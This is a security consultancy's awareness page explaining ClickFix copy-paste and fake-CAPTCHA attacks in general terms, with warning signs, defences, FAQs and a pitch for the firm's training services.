• Home
  • ClickFix & Copy-Paste
Threat 03 // ClickFix

ClickFix & Copy-Paste Attacks

The cleverest part of a ClickFix attack is that the victim does all the work. A fake error or fake CAPTCHA convinces them to copy a command and paste it into their own computer — running the attacker’s code with their own hands.

# What it is

ClickFix is a social-engineering attack that persuades a person to run a malicious command themselves. The victim is shown a fake problem — a broken document, a failed update, a “verify you are human” check — and given simple instructions to “fix” it: copy this, paste it here, press Enter.

Those instructions are the attack. Pasting the text into the Windows Run box, a terminal, or a browser console runs the attacker’s code. Because the user carries out every step, there is no malicious attachment to block and no suspicious download to scan.

Key idea

ClickFix weaponises helpfulness. It reframes “run this command” as “solve your problem” — and the security warning never appears, because the victim is the one giving the order.

# How the attack works

  1. Bait. The victim lands on a compromised or malicious page — via a search result, an ad, a link, or a QR code.
  2. Fake problem. A convincing overlay appears: a document that “won’t display,” an error that needs a fix, or a CAPTCHA that needs “verification.”
  3. Instructions. The page walks the user through a few steps: press a key combination, paste the clipboard contents, press Enter. The text was silently placed on their clipboard.
  4. Self-infection. Those steps run a hidden command that downloads and launches the real payload — an information stealer, remote-access tool or ransomware loader.
  5. Aftermath. The attacker now has code running as the user, and often moves on to credential theft or deeper access.

# Real-world examples

Common disguises used by ClickFix campaigns:

  • Fake CAPTCHA / “Verify you are human.” A familiar-looking check that asks you to paste a value and press Enter instead of clicking images.
  • “This document failed to load.” A shared file that tells you to run a step to “fix display issues.”
  • Fake browser or app update. A pop-up insisting you must run a command to complete a critical update.
  • Fake meeting or support fix. A “join the call” or “repair your connection” prompt that hides a command.
The tell

Legitimate websites, documents and CAPTCHAs never ask you to open the Run dialog or a terminal and paste something. That request, by itself, is the red flag.

# How to detect it

Stop and treat the page as hostile the moment you see any of this:

  • A website or document tells you to press the Windows key + R, or to open a terminal.
  • You are asked to paste something and press Enter to “fix” or “verify.”
  • A “CAPTCHA” gives keyboard instructions instead of a normal image or checkbox.
  • An error message is unusually specific about the exact keys to press.
  • You did not knowingly copy anything, yet you are told to paste from the clipboard.
  • The page creates urgency: the “fix” must be done right now.

# How to defend against it

People

  • Teach one firm rule: never paste commands you did not write to fix a website.
  • Make “press Win+R and paste this” an automatic stop-and-report trigger.
  • Reassure staff that early reporting is rewarded, never punished.
  • Run awareness training that shows real fake-CAPTCHA examples.

Technology & process

  • Restrict or monitor the Run dialog and scripting tools for standard users.
  • Use endpoint protection that flags scripts launched from the clipboard or browser.
  • Filter web and email traffic to cut off the malicious pages and payloads.
  • Have a clear, fast incident-response path for “I think I ran something.”

# How Pendergrass Consulting helps

ClickFix is defeated mostly at the human layer, backed by good endpoint hygiene. Pendergrass Consulting delivers security awareness training built around current copy-paste and fake-CAPTCHA lures, hardens endpoints with monitoring and application control, and gives your team a rapid response process so a moment of misplaced trust does not become a breach.

Explore our services

# Frequently asked questions

What is a ClickFix attack?
ClickFix is a social-engineering attack that tricks a person into copying a command and pasting it into their own computer — usually via the Run dialog or a terminal. A fake error message or fake CAPTCHA presents this as a "fix" or "verification step," when it actually runs the attacker's code.
Why is the copy-paste trick so effective?
Because the victim performs every step themselves. There is no malicious download to block and no attachment to scan — the user is convinced they are fixing a problem or proving they are human, so they willingly run the command.
What does a fake CAPTCHA attack look like?
It looks like an ordinary "verify you are human" box. Instead of clicking images, it instructs you to press a key combination, paste something, and press Enter. Those instructions silently run a hidden command on your machine.
What should an employee do if they fall for one?
Stop immediately, disconnect the device from the network, and report it to IT or your security provider right away. Fast reporting dramatically limits the damage — there is no blame in catching it early.

SECURE.EXE

Would your team paste a "quick fix" without thinking?

One trained pause stops this entire attack. Pendergrass Consulting can build that instinct across your organisation with realistic, modern training.

Book a Security Review Call +1-252-432-3325